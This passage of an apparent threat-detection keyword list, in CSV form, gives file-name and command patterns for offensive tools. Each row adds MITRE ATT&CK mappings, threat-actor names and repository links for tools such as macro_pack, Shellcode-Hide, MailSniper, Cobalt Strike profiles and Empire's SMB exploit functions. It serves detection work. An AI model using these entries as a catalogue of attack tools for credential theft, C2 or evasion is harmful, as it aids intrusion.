tools,https://github.com/angryip/ipscan,1,0,N/A,7,10,3517,683,2023-09-11T16:36:25Z,2011-06-28T20:58:48Z -*macro_pack*,offensive_tool_keyword,macro_pack,The macro_pack is a tool used to automatize obfuscation and generation of retro formats such as MS Office documents or VBS like format. 
Now it also handles various shortcuts formats.,T1566.001 - T1564.001 - T1564.003,TA0002 - TA0007 - TA0008,N/A,N/A,Exploitation tools,https://github.com/sevagas/macro_pack,1,0,N/A,N/A,10,1950,404,2022-05-12T13:30:29Z,2017-10-03T18:30:06Z -*MacroDetectSandbox.vbs*,offensive_tool_keyword,phishing-HTML-linter,Phishing and Social-Engineering related scripts,T1566.001 - T1056.001,TA0040 - TA0001,N/A,N/A,Phishing,https://github.com/mgeeky/Penetration-Testing-Tools/blob/master/phishing,1,1,N/A,10,10,2282,458,2023-06-27T19:16:49Z,2018-02-02T21:24:03Z -*MacroExploit.txt*,offensive_tool_keyword,Excel-Exploit,MacroExploit use in excel sheet,T1137.001 - T1203 - T1059.007 - T1566.001 - T1564.003,TA0005 - TA0002,N/A,N/A,Exploitation tools,https://github.com/Mr-Cyb3rgh0st/Excel-Exploit/tree/main,1,1,N/A,N/A,1,21,4,2023-06-12T11:47:52Z,2023-06-12T11:46:53Z -*Macrome *--decoy-document*,offensive_tool_keyword,Macrome,An Excel Macro Document Reader/Writer for Red Teamers & Analysts. Blog posts describing what this tool actually does can be found https://malware.pizza/2020/05/12/evading-av-with-excel-macros-and-biff8-xls/ and https://malware.pizza/2020/06/19/further-evasion-in-the-forgotten-corners-of-ms-xls/,T1140,TA0005,N/A,N/A,Exploitation tools,https://github.com/michaelweber/Macrome,1,0,N/A,N/A,6,522,83,2022-02-01T16:26:13Z,2020-05-07T22:44:11Z -*Macrome *--payload*,offensive_tool_keyword,Macrome,An Excel Macro Document Reader/Writer for Red Teamers & Analysts. Blog posts describing what this tool actually does can be found https://malware.pizza/2020/05/12/evading-av-with-excel-macros-and-biff8-xls/ and https://malware.pizza/2020/06/19/further-evasion-in-the-forgotten-corners-of-ms-xls/,T1140,TA0005,N/A,N/A,Exploitation tools,https://github.com/michaelweber/Macrome,1,0,N/A,N/A,6,522,83,2022-02-01T16:26:13Z,2020-05-07T22:44:11Z -*Macrome build*,offensive_tool_keyword,Macrome,An Excel Macro Document Reader/Writer for Red Teamers & Analysts. 
Blog posts describing what this tool actually does can be found https://malware.pizza/2020/05/12/evading-av-with-excel-macros-and-biff8-xls/ and https://malware.pizza/2020/06/19/further-evasion-in-the-forgotten-corners-of-ms-xls/,T1140,TA0005,N/A,N/A,Exploitation tools,https://github.com/michaelweber/Macrome,1,0,N/A,N/A,6,522,83,2022-02-01T16:26:13Z,2020-05-07T22:44:11Z -*Macrome.csproj*,offensive_tool_keyword,Macrome,An Excel Macro Document Reader/Writer for Red Teamers & Analysts. Blog posts describing what this tool actually does can be found https://malware.pizza/2020/05/12/evading-av-with-excel-macros-and-biff8-xls/ and https://malware.pizza/2020/06/19/further-evasion-in-the-forgotten-corners-of-ms-xls/,T1140,TA0005,N/A,N/A,Exploitation tools,https://github.com/michaelweber/Macrome,1,1,N/A,N/A,6,522,83,2022-02-01T16:26:13Z,2020-05-07T22:44:11Z -*Macrome.dll*,offensive_tool_keyword,Macrome,An Excel Macro Document Reader/Writer for Red Teamers & Analysts. Blog posts describing what this tool actually does can be found https://malware.pizza/2020/05/12/evading-av-with-excel-macros-and-biff8-xls/ and https://malware.pizza/2020/06/19/further-evasion-in-the-forgotten-corners-of-ms-xls/,T1140,TA0005,N/A,N/A,Exploitation tools,https://github.com/michaelweber/Macrome,1,1,N/A,N/A,6,522,83,2022-02-01T16:26:13Z,2020-05-07T22:44:11Z -*Macrome.sln*,offensive_tool_keyword,Macrome,An Excel Macro Document Reader/Writer for Red Teamers & Analysts. 
Blog posts describing what this tool actually does can be found https://malware.pizza/2020/05/12/evading-av-with-excel-macros-and-biff8-xls/ and https://malware.pizza/2020/06/19/further-evasion-in-the-forgotten-corners-of-ms-xls/,T1140,TA0005,N/A,N/A,Exploitation tools,https://github.com/michaelweber/Macrome,1,1,N/A,N/A,6,522,83,2022-02-01T16:26:13Z,2020-05-07T22:44:11Z -*MACshellcode.cpp*,offensive_tool_keyword,Shellcode-Hide,simple shellcode Loader - Encoders (base64 - custom - UUID - IPv4 - MAC) - Encryptors (AES) - Fileless Loader (Winhttp socket),T1059.003 - T1027 - T1132 - T1027.002 - T1045 - T1027.004 - T1105,TA0005 - TA0001 - TA0003,N/A,N/A,Defense Evasion,https://github.com/TheD1rkMtr/Shellcode-Hide,1,1,N/A,9,3,296,75,2023-08-02T02:22:20Z,2023-02-05T17:31:43Z -*MACshellcode.exe*,offensive_tool_keyword,Shellcode-Hide,simple shellcode Loader - Encoders (base64 - custom - UUID - IPv4 - MAC) - Encryptors (AES) - Fileless Loader (Winhttp socket),T1059.003 - T1027 - T1132 - T1027.002 - T1045 - T1027.004 - T1105,TA0005 - TA0001 - TA0003,N/A,N/A,Defense Evasion,https://github.com/TheD1rkMtr/Shellcode-Hide,1,1,N/A,9,3,296,75,2023-08-02T02:22:20Z,2023-02-05T17:31:43Z -*MACshellcode.sln*,offensive_tool_keyword,Shellcode-Hide,simple shellcode Loader - Encoders (base64 - custom - UUID - IPv4 - MAC) - Encryptors (AES) - Fileless Loader (Winhttp socket),T1059.003 - T1027 - T1132 - T1027.002 - T1045 - T1027.004 - T1105,TA0005 - TA0001 - TA0003,N/A,N/A,Defense Evasion,https://github.com/TheD1rkMtr/Shellcode-Hide,1,1,N/A,9,3,296,75,2023-08-02T02:22:20Z,2023-02-05T17:31:43Z -*MACshellcode.vcxproj*,offensive_tool_keyword,Shellcode-Hide,simple shellcode Loader - Encoders (base64 - custom - UUID - IPv4 - MAC) - Encryptors (AES) - Fileless Loader (Winhttp socket),T1059.003 - T1027 - T1132 - T1027.002 - T1045 - T1027.004 - T1105,TA0005 - TA0001 - TA0003,N/A,N/A,Defense 
Evasion,https://github.com/TheD1rkMtr/Shellcode-Hide,1,1,N/A,9,3,296,75,2023-08-02T02:22:20Z,2023-02-05T17:31:43Z -*magicRasMan*,offensive_tool_keyword,RasmanPotato,using RasMan service for privilege escalation,T1548.002 - T1055.002 - T1055.001 ,TA0004 - TA0005 - TA0040,N/A,N/A,Privilege Escalation,https://github.com/crisprss/RasmanPotato,1,0,N/A,10,4,353,54,2023-02-06T10:27:41Z,2023-02-06T09:41:51Z -*Magnitude Exploit Kit*,offensive_tool_keyword,cobaltstrike,Malleable C2 is a domain specific language to redefine indicators in Beacon's communication. This repository is a collection of Malleable C2 profiles that you may use. These profiles work with Cobalt Strike 3.x,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/rsmudge/Malleable-C2-Profiles,1,0,N/A,10,10,1362,429,2021-05-18T14:45:39Z,2014-07-14T15:02:42Z -*mailpv.exe*,offensive_tool_keyword,mailpv,Mail PassView is a small password-recovery tool that reveals the passwords and other account details in email clients,T1003 - T1021 - T1056 - T1110 - T1212 - T1552,TA0001 - TA0002 - TA0003 - 
TA0005 - TA0006 - TA0007 - TA0011,N/A,N/A,Credential Access,https://www.nirsoft.net/utils/mailpv.html,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*mailpv.zip*,offensive_tool_keyword,mailpv,Mail PassView is a small password-recovery tool that reveals the passwords and other account details in email clients,T1003 - T1021 - T1056 - T1110 - T1212 - T1552,TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0011,N/A,N/A,Credential Access,https://www.nirsoft.net/utils/mailpv.html,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*MailSniper*,offensive_tool_keyword,MailSniper,MailSniper is a penetration testing tool for searching through email in a Microsoft Exchange environment for specific terms (passwords. insider intel. network architecture information. etc...). It can be used as a non-administrative user to search their own email. or by an Exchange administrator to search the mailboxes of every user in a domain,T1083 - T1114 - T1003,TA0003 - TA0007 - TA0040,N/A,N/A,Information Gathering,https://github.com/dafthack/MailSniper,1,1,N/A,N/A,10,2625,554,2022-10-20T08:13:33Z,2016-09-08T00:36:51Z -*MailSniper.ps1*,offensive_tool_keyword,MailSniper,MailSniper is a penetration testing tool for searching through email in a Microsoft Exchange environment for specific terms (passwords. insider intel. network architecture information. etc.). It can be used as a non-administrative user to search their own email. 
or by an administrator to search the mailboxes of every user in a domain.,T1114 - T1134.002,TA0005 - TA0006,N/A,N/A,Credential Access,https://github.com/dafthack/MailSniper/blob/master/MailSniper.ps1,1,1,N/A,N/A,10,2625,554,2022-10-20T08:13:33Z,2016-09-08T00:36:51Z -*main/gcr.py*,offensive_tool_keyword,GCR-Google-Calendar-RAT,Google Calendar RAT is a PoC of Command&Control over Google Calendar Events,T1071.001 - T1021.002 - T1059,TA0002 - TA0005,N/A,N/A,C2,https://github.com/MrSaighnal/GCR-Google-Calendar-RAT,1,1,N/A,10,10,78,15,2023-06-26T09:04:02Z,2023-06-18T13:23:31Z -*main_air_service-probes.go*,offensive_tool_keyword,cobaltstrike,ServerScan is a high-concurrency network scanning and service detection tool developed in Golang.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/Adminisme/ServerScan,1,1,N/A,10,10,1430,218,2022-06-28T08:27:39Z,2020-04-03T15:14:12Z -*main_pro_service-probes.go*,offensive_tool_keyword,cobaltstrike,ServerScan is a high-concurrency network scanning and service detection tool developed in Golang.,T1548.002 - 
T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/Adminisme/ServerScan,1,1,N/A,10,10,1430,218,2022-06-28T08:27:39Z,2020-04-03T15:14:12Z -*majdfhpaihoncoakbjgbdhglocklcgno*,greyware_tool_keyword,Free VPN,External VPN usage within coporate network,T1090.003 - T1133 - T1572,TA0003 - TA0001 - TA0011 - TA0010 - TA0005,N/A,N/A,Data Exfiltration,https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml,1,0,detection in registry,8,10,N/A,N/A,N/A,N/A -*make_avet -l *.exe *,offensive_tool_keyword,venom,venom - C2 shellcode generator/compiler/handler,T1027 - T1055 - T1071 - T1505 - T1566 - T1570,TA0001 - TA0002 - TA0003 - TA0008 - TA0010,N/A,N/A,POST Exploitation tools,https://github.com/r00t-3xp10it/venom,1,0,N/A,N/A,10,1617,584,2023-10-03T22:06:35Z,2016-11-16T10:40:04Z -*make_avetsvc *,offensive_tool_keyword,venom,venom - C2 shellcode generator/compiler/handler,T1027 - T1055 - T1071 - T1505 - T1566 - T1570,TA0001 - TA0002 - TA0003 - TA0008 - TA0010,N/A,N/A,POST 
Exploitation tools,https://github.com/r00t-3xp10it/venom,1,0,N/A,N/A,10,1617,584,2023-10-03T22:06:35Z,2016-11-16T10:40:04Z -*make_kernel_shellcode*,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,Exploit-EternalBlue.ps1,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*make_kernel_user_payload*,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. 
While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,Exploit-EternalBlue.ps1,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*make_smb1_anonymous_login_packet*,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,Exploit-EternalBlue.ps1,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*make_smb1_echo_packet*,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,Exploit-EternalBlue.ps1,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*make_smb1_free_hole_session_packet*,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,Exploit-EternalBlue.ps1,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*make_smb1_nt_trans_packet*,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,Exploit-EternalBlue.ps1,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*make_smb1_trans2_explo*,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,Exploit-EternalBlue.ps1,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*make_smb2_payload_body_packet*,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,Exploit-EternalBlue.ps1,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*make_smb2_payload_headers_packet*,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,Exploit-EternalBlue.ps1,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*makebof.bat*,offensive_tool_keyword,cobaltstrike,Takes the original PPLFault and the original included DumpShellcode and combinds it all into a BOF targeting cobalt strike.,T1055 - T1078.003,TA0002 - TA0006,N/A,N/A,Credential Access,https://github.com/trustedsec/PPLFaultDumpBOF,1,1,N/A,N/A,2,115,11,2023-05-17T12:57:20Z,2023-05-16T13:02:22Z -*MakeHTTPSmugglerJAR.launch*,offensive_tool_keyword,burpsuite,A Burp Suite extension to help pentesters to bypass WAFs or test their effectiveness using a number of techniques,T1556 - T1556.001 - T1556.002 - T1556.003 - T1557 - T1558 - T1573 - T1574,TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,Network Exploitation 
